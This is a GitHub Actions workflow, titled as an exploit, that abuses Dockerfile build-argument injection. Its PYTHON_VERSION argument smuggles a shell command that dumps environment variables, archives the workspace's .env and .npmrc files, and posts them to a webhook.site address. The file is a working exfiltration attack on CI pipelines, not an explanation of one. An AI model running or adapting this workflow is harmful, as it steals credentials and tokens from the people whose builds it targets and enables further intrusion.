name: Enhanced Exploit Dockerfile ARG Injection

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest

    permissions:
      id-token: write
      contents: read

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Build and Exfiltrate
        run: |
          docker build . \
            --build-arg PYTHON_VERSION='(env; echo "--- FILES ---"; tar -czf - /github/workspace/.env /github/workspace/.npmrc 2>/dev/null) | curl -X POST --data-binary @- https://webhook.site/529200f3-872d-4083-bf2d-b5c014761b69' \
            --file Dockerfile
